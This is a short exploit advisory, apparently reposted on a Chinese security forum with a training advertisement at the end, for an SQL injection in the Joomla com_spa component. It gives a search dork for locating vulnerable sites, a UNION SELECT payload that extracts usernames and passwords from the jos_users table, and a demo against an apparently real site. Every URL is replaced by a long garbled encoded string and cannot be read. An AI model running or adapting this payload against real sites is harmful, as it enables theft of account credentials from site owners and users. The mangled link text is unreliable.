====================================================  

Joomla Component com_spa SQL Injection Vulnerability  

====================================================  

   

Author :   altbta  

Email  : [l_9[at]hotmail[dot]com]  

Homepage : { feaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2H3x3e0m8Q4x3X3g2U0L8$3#2Q4x3V1k6^5M7o6p5H3 }  

DORK    :  inurl:"index.php?option=com_spa"  

===================================================  

   

[+] Vulnerable File :  

1baK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6A6L8X3c8W2P5q4)9J5k6i4m8Z5M7q4)9K6c8X3!0H3N6r3W2G2L8W2)9K6c8r3y4G2L8g2)9#2k6Y4y4H3j5g2)9J5y4Y4k6A6k6i4N6Q4x3@1c8K6M7r3q4Q4y4h3k6J5k6h3q4V1i4K6g2X3L8h3!0J5k6g2)9J5y4Y4m8A6k6q4)9K6c8q4)9#2b7W2y4c8e0q4)9#2c8l9`.`.  

   

[+] ExploiT :  

-35 UNION SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13  

from jos_users--  

   

[+] Example :  

527K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6A6L8X3c8W2P5q4)9J5k6i4m8Z5M7q4)9K6c8X3!0H3N6r3W2G2L8W2)9K6c8r3y4G2L8g2)9#2k6Y4y4H3j5g2)9J5y4Y4k6A6k6i4N6Q4x3@1c8K6M7r3q4Q4y4h3k6J5k6h3q4V1i4K6g2X3L8h3!0J5k6g2)9J5y4Y4m8A6k6q4)9K6c8q4)9J5k6o6x3#2g2f1&6u0e0@1^5`.  

SELECT 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13 from  

jos_users--  

   

[+] Demo :  

19eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6A6L8X3c8W2P5q4)9J5k6i4m8Z5M7q4)9K6c8X3!0H3N6r3W2G2L8W2)9K6c8r3y4G2L8g2)9#2k6Y4y4H3j5g2)9J5y4Y4k6A6k6i4N6Q4x3@1c8K6M7r3q4Q4y4h3k6J5k6h3q4V1i4K6g2X3L8h3!0J5k6g2)9J5y4Y4m8A6k6q4)9K6c8q4)9J5k6o6x3#2i4K6t1#2x3U0m8g2e0V1W2a6e0W2)9J5y4e0t1H3f1@1g2x3c8f1y4f1i4K6t1#2x3U0l9I4i4K6u0o6x3W2)9J5b7K6y4Q4x3V1x3@1i4K6u0o6j5$3!0F1j5$3q4@1i4K6t1^5N6i4y4W2M7X3&6S2L8h3g2Q4x3V1x3H3P5o6y4S2i4K6u0o6M7r3q4K6M7%4N6G2M7X3c8Q4x3U0W2Q4x3V1x3$3i4K6u0o6y4#2)9J5b7K6S2Q4x3V1x3&6i4K6u0o6x3e0m8Q4x3V1x3I4x3g2)9J5b7K6p5J5i4K6u0o6x3e0y4Q4x3U0f1J5x3r3k6J5L8$3#2Q4x3U0f1J5x3r3A6G2M7#2)9#2k6Y4g2K6k6i4u0K6i4K6u0V1i4K6u0V1 

[培训]科锐逆向工程师培训第53期2025年7月8日开班！